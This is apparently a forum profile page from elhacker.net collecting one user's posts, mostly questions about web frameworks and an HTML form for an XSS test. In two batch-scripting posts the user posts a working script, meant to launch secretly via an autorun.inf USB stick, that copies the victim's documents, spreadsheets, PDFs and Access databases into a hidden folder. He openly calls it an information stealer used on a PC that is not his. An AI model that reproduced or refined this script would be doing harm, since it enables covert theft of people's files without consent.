elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12
1  Programación / Desarrollo Web / Re: Frameworks en: 4 Junio 2012, 19:27 pm
El As del Club Paris, gracias por toda la info es realmente útil. Como ya comente en otro post, había leído sobre Django, así que me lo instale y he estado trasteando un poco. El hecho de que se programe en Python me agrada mucho, ya que me desenvuelvo bastante bien en Python, aunque no seria gran problema pasme a PHP. Me ha parecido interesante lo que me has comentado y le echaré un vistazo a CodeIgniter.

 ~ Yoya ~, gracias a ti también pero de momento no estoy preparado para la parte de CSS, la verdad soy muy malo diseñando y prefiero que eso lo haga alguien que sabe y le guste mas que a mi.

 Y gracias también a cassiani.

Un saludo
2  Programación / Desarrollo Web / Re: Frameworks en: 2 Junio 2012, 10:50 am
Se que hay muchos frameworks, por eso pregunto, xD.

También he leído sobre Django, ¿Qué tal es? ¿Alguna referencia?

Luego se pueden juntar varios frameworks para un mismo desarrollo, o eso ¿es realmente un jaleo? porque por lo que he leído para Django se programa en Python, pero si me interesa en algunas ocasiones usar alguna característica de synfony por ejemplo ¿puedo juntarlos? o ¿si se empieza con un framework hay que acabar con el mismo? y buscar la forma de implementar la característica de synfony en Django, por seguir el ejemplo.


3  Programación / Desarrollo Web / Frameworks en: 2 Junio 2012, 10:36 am
Hola a todos, tengo en mente un proyecto que podría ser interesante si llegara a buen termino, la cuestión es que yo suelo desarrollar webs a base de bloc de notas y picar código, y así uno no evoluciona. Por eso que he decidido empezar a utilizar frameworks de desarrollo web, la cuestión es cual elegir para mi proyecto, ¿En que debería basarme para elegir uno u otro? ¿Cuales son los más importantes? ¿Qué debería saber antes de iniciarme en un framewrok? ¿Algún consejo general para el uso de frameworks?
frameworks
Un saludo y muchísimas gracias.
4  Programación / Desarrollo Web / Re: ¿Error formulario html o yo ciego? en: 11 Mayo 2012, 16:13 pm
Gracias a los dos, ya sabia yo que eres una tontería, pero aveces no menos el fallo mas tonto.
5  Programación / Desarrollo Web / ¿Error formulario html o yo ciego? en: 11 Mayo 2012, 01:21 am
Hola estoy empezando a volverme loco, alguien podría decirme que hay mal en este formulario HTML. Estoy haciendo unas pruebas y me estoy desesperando.

Decir que ambos archivos están en el mismo directorio, i el xss.php es accesible i se ejecuta correctamente, pero no hay manera con el formulario.

Código
  1. <title>Esto es una prueba de concepto.</title>
  2. </head>
  3. <h1 style="text-algin:center;">Esto es una prueba de XSS</h1>
  4. <form action="xss.php" method="get">
  5. Nombre: <input type="text" name="v" /> <input type="button" value="Enviar" />
  6. </form>
  7. </body>
  8. </html>
  9.  

Gracias.
6  Foros Generales / Foro Libre / Re: [propuesta] Interesado en la formacion de un grupo de newbies? en: 1 Agosto 2011, 15:46 pm
Me uno a la propuesta, estaré atento a cualquier cosa que se comente.

Un saludo.

Participantes:
dArKo2
eagle17
portaro
kub0x
bitaziko
mini_nauta
IWKY
7  Foros Generales / Foro Libre / Re: la mejores frases para romper el hielo en: 15 Abril 2011, 14:19 pm
 - Preciosa, ¿podrías decirme tu nombre? Así te pido para reyes.
8  Programación / Scripting / Re: Combinación lógica en sentencia IF [Batch] en: 27 Junio 2010, 20:33 pm
Ahora estoy fuera y no puedo probar nada, pero la idea del code es que un autorun.inf en un pendrive, lanza un ejecutable que abre el Explorer con la carpeta del pendrive y ocultamente lanza el batch, que trata de copiar todos los documentos  (que interesan) del directorio del usuario a una carpeta oculta en el pendrive.

...es tu pc?  :¬¬  :laugh: xq es oculta  ;-)

No, no es mi PC, como ya he dicho antes es una especie de roba-información. Está claro que no es lo último en ocultamiento pero puede engañar a más de uno.

Cuando lleve a casa publicaré todo el code y opinaís.


Un saludo
9  Programación / Scripting / Re: Combinación lógica en sentencia IF [Batch] en: 26 Junio 2010, 10:42 am
mmmm....

No me termina de servir, porque tu implementación solo encuentra una coincidencia sale del FOR y se va al :found, yo quisiera que se quedara dentro del FOR, te pongo el código para que lo veas.

Código
  1. @echo off
  2.  
  3. set ruta=%~dp0
  4. set save=%ruta%save
  5.  
  6. if not exist "%save%" (
  7. mkdir "%save%" > nul
  8. attrib +R +H "%save%" > nul
  9. )
  10.  
  11. %HOMEDRIVE% > nul
  12. cd %HOMEPATH% > nul
  13.  
  14.  
  15. for /R %%x in (*.*) do (
  16. if "%%~xx" == ".xls" (
  17. copy "%%x" "%save%\%%~nx%%~xx" /Y > nul
  18. ) else (
  19. if "%%~xx" == ".xlsx" (
  20. copy "%%x" "%save%\%%~nx%%~xx" /Y > nul
  21. ) else (
  22. if "%%~xx" == ".doc" (
  23. copy "%%x" "%save%\%%~nx%%~xx" /Y > nul
  24. ) else (
  25. if "%%~xx" == ".docx" (
  26. copy "%%x" "%save%\%%~nx%%~xx" /Y > nul
  27. ) else (
  28. if "%%~xx" == ".pdf" (
  29. copy "%%x" "%save%\%%~nx%%~xx" /Y > nul
  30. ) else (
  31. if "%%~xx" == ".mdb" (
  32. copy "%%x" "%save%\%%~nx%%~xx" /Y > nul
  33. ) else (
  34. if "%%~xx" == ".accdb" (
  35. copy "%%x" "%save%\%%~nx%%~xx" /Y > nul
  36. )
  37. )
  38. )
  39. )
  40. )
  41. )
  42. )
  43. ) > nul
  44.  
  45. exit /b 0
  46.  
  47.  


Si utilizo tu código se saldría del for con la primera coincidencia, y no creo que con otro GOTO hacia dentro del FOR funcione, así que o existe otra opción o creo que se quedará así, aunque no veo lógico que no se pueda hacer una combinación lógica dentro de un IF.



*** EDITO ***

Estoy probando otra cosa, en la cual uso tu código.
Código
  1. for /R %%x in (*) do (
  2. for %%e in (.xls, .xlsx, .doc, .docx .pdf .mdb .accdb) do (
  3. echo %%x | findstr /i "%%e\>" && goto found
  4. goto nofound
  5. :found
  6. copy "%%x" "%save%\%%~nx%%~xx" /Y > nul
  7. :nofound
  8. ) > nul
  9. ) > nul
  10.  
  11.  

Y el problema que surge en este caso, es que después de la etiqueta :nofound da un error: La sintaxis del comando no es correcta..
La idea es que si no coincide que continue en la ejecución del bucle, pero da ese error, y ahora mismo no se me ocurre como hacer una combinación de goto's para que funcione bien.

Saludos.
10  Programación / Scripting / Re: Combinación lógica en sentencia IF [Batch] en: 26 Junio 2010, 09:39 am
Gracias, voy a probarlo, de momento tengo toda una cadena de if - else - if,. Está solución aunque no queda muy bonita (no tiene estética) parece ser que soluciona el problema que yo comentaba, pero hay que reconocer que es un poco rebuscado, en fin gracias de nuevo, y ya comento que tal funciona.
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines